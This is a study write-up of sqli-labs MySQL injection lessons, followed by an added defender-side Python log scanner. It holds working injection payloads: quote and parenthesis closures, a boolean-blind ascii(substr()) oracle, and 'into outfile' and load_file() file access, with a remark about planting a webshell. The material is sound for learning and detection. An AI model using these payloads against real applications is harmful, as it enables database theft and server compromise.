Less THREE
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
Stripping the leading and trailing quotes shows
that the syntax error is located at '1'') LIMIT 0,1'
The single quote right after 1 is the one I added myself, so the query must be of the form where id =.. 'xx')
(xx is the content we supply)
So our payload appends ') after 1 to close the expression, then comments out the trailing ')
?id=1') union select ..--+
Background knowledge
left() function
left(a,b) takes the first b characters of a, counting from the left; comparing the result to a string returns 1 when it matches and 0 when it does not
mysql> select left(database(),3)='sec';
+--------------------------+
| left(database(),3)='sec' |
+--------------------------+
|                        1 |
+--------------------------+
1 row in set (0.00 sec)
mysql> select left(database(),3)
    -> ;
+--------------------+
| left(database(),3) |
+--------------------+
| sec                |
+--------------------+
1 row in set (0.00 sec)
regexp() function
e.g. select user() regexp 'r': user() returns root, and regexp tests root against the regular expression 'r';
matching proceeds from left to right
mysql> select user() regexp 'root';
+----------------------+
| user() regexp 'root' |
+----------------------+
|                    1 |
+----------------------+
1 row in set (0.00 sec)
mysql> select user() regexp 'r';
+-------------------+
| user() regexp 'r' |
+-------------------+
|                 1 |
+-------------------+
1 row in set (0.00 sec)
mysql> select user() regexp 'roo';
+---------------------+
| user() regexp 'roo' |
+---------------------+
|                   1 |
+---------------------+
1 row in set (0.00 sec)
mysql> select user() regexp 'rot';
+---------------------+
| user() regexp 'rot' |
+---------------------+
|                   0 |
+---------------------+
1 row in set (0.00 sec)
mysql> select user() regexp 'r*';
+--------------------+
| user() regexp 'r*' |
+--------------------+
|                  1 |
+--------------------+
1 row in set (0.00 sec)
substr()
substr(string,a,b)
Starting at position a of string, take b characters
mysql> select substr(database(),1,1);
+------------------------+
| substr(database(),1,1) |
+------------------------+
| s                      |
+------------------------+
1 row in set (0.00 sec)
mysql> select substr(database(),2,1);
+------------------------+
| substr(database(),2,1) |
+------------------------+
| e                      |
+------------------------+
1 row in set (0.00 sec)
mysql> select substr(database(),2,3);
+------------------------+
| substr(database(),2,3) |
+------------------------+
| ecu                    |
+------------------------+
1 row in set (0.00 sec)
ascii()
mysql> select ascii('a');
+------------+
| ascii('a') |
+------------+
|         97 |
+------------+
1 row in set (0.01 sec)
Less FIVE
Boolean-based
From testing we know
that when the statement is correct the page shows the words "You are in"
/?id='1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >10--+
By testing the ASCII value of the first character of the database name we narrow the range step by step
e.g. : >10 ---> >90 ---> <100 ---> >95 ...
Probing step by step, ==99 finally also shows "You are in", so that value is correct
Boolean-based injection can generally only be exploited with a script or a tool; manual injection is far too slow!
Further knowledge
Writing a file to the default path
mysql> select 'crow' into outfile 'test1.txt'
-> ;
Query OK, 1 row affected (0.01 sec)
mysql> select 'crow' into outfile 'test1.txt';
ERROR 1086 (HY000): File 'test1.txt' already exists
mysql>
The default path for this file write is D:\phpStudy\PHPTutorial\MySQL\data\ (the MySQL\data\ directory)
Writing a file to a specified path
mysql> select 'crow' into outfile 'D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt';
ERROR 1 (HY000): Can't create/write to file 'D:phpStudyPHPTutorialWWWsqli-labs-masterLess-7 est1.txt' (Errcode: 22)
mysql> select 'crow' into outfile 'D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt';
ERROR 1 (HY000): Can't create/write to file 'D:phpStudyPHPTutorialWWWsqli-labs-masterLess-7\test1.txt' (Errcode: 2)
mysql> select 'crow' into outfile 'D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt';
Query OK, 1 row affected (0.00 sec)
mysql> select 'crow' into outfile 'D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt';
ERROR 1086 (HY000): File 'D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt' already exists
mysql>
Note here: remember to double the backslashes!! Otherwise they are treated as escape characters and the path ends up wrong
This is where a one-line trojan could be written to serve as a webshell
Reading a file
mysql> select load_file('D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt');
+----------------------------------------------------------------------------------+
| load_file('D:\phpStudy\PHPTutorial\WWW\sqli-labs-master\Less-7\test1.txt') |
+----------------------------------------------------------------------------------+
| crow
|
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql>
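As an added example that is not part of the original post, here is a defender-side log scan covering the techniques in both lessons above: it URL-decodes request targets from access-log lines and flags the ') closure, the left()/substr() prefix comparisons, the ascii(substr()) character oracle (whose repeated narrowing probes, >10 then >90 then <100, mark a boolean-blind script), and into outfile / load_file. The log lines, client addresses, the probe threshold and the signature regexes are constructed assumptions, not anything from the post or from sqli-labs.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined-log style, shortened); not from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-3/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-3/?id=1')%20union%20select%201,2,3--+ HTTP/1.1" 200 498
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-5/?id=1'%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%201,1),1,1))%3E10--+ HTTP/1.1" 200 480
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-5/?id=1'%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%201,1),1,1))%3E90--+ HTTP/1.1" 200 480
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-5/?id=1'%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%201,1),1,1))%3C100--+ HTTP/1.1" 200 480
10.0.0.8 - - [01/Jan/2024:10:00:06 +0000] "GET /Less-5/?id=1'%20and%20left(database(),3)='sec'--+ HTTP/1.1" 200 480
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /Less-7/?id=1'))%20union%20select%201,2,3%20into%20outfile%20'x.txt'--+ HTTP/1.1" 200 470
"""

# Combined-log prefix: client address, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Signatures for the techniques the write-up walks through (matched after URL decoding).
SIGNATURES = {
    "char_oracle": re.compile(r"ascii\s*\(\s*substr", re.I),                      # ascii(substr(...)) > N
    "prefix_oracle": re.compile(r"\b(left|substr|substring|mid)\s*\(.*?\)\s*(=|regexp|like)", re.I),
    "file_io": re.compile(r"\b(into\s+(out|dump)file\b|load_file\s*\()", re.I),    # write / read server files
    "closure": re.compile(r"""['"]\)+\s*(and|or|union|--|#)"""),                   # ') or ')) then a new clause
}

def classify_request(raw_target: str) -> set:
    """Decode the request target once, as the web server does, and return the matching signature names."""
    decoded = unquote_plus(raw_target)  # also turns the trailing '--+' into '-- '
    return {name for name, pat in SIGNATURES.items() if pat.search(decoded)}

def scan_log(text: str, blind_threshold: int = 3):
    """Return (findings, blind_clients): one (client, path, sorted tags) per flagged request, and
    the clients whose char-oracle probe count reaches blind_threshold (an assumed cut-off)."""
    findings, oracle_hits = [], Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        tags = classify_request(target)
        if tags:
            findings.append((client, target.split("?", 1)[0], sorted(tags)))
        if "char_oracle" in tags:
            oracle_hits[client] += 1
    blind_clients = sorted(c for c, n in oracle_hits.items() if n >= blind_threshold)
    return findings, blind_clients
```

In production the probe count should be bounded by a time window per client, and on the database side the secure_file_priv setting confines into outfile and load_file to a single directory (or disables them), which is the control that stops the file write and read shown above.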